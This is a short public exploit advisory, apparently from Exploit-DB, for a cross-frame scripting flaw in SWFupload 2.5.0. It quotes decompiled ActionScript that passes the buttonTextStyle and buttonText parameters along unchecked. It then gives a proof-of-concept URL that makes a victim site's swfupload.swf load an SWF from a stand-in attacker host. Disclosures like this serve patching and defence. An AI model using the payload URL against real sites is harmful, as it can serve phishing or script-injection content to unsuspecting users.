SWFupload 2.5.0 - Cross Frame Scripting (XFS)

Author: MindCracker
type: webapps
platform: multiple
port: 
date_added: 2015-01-26  
date_updated: 2015-01-26  
verified: 0  
codes: OSVDB-117564  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 35908.txt  

# Exploit Title: SWFupload All Version XSF Vulnerability

# Date: 25/01/2014

# Exploit Author: MindCracker - Team MaDLeeTs

# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan

# Verion : All

# Tested on: Linux / Window

#Description :

XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting

#Vulnerable Code :


ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);

  this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
         }
         catch(ex:Object)
         {
            this.SetButtonTextStyle("");
         }
         try
         {

As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file

http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf

2.

ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText

{
            this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
         }
         catch(ex:Object)
         {
            this.SetButtonText("");
         }
         try
         {

#POC

http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf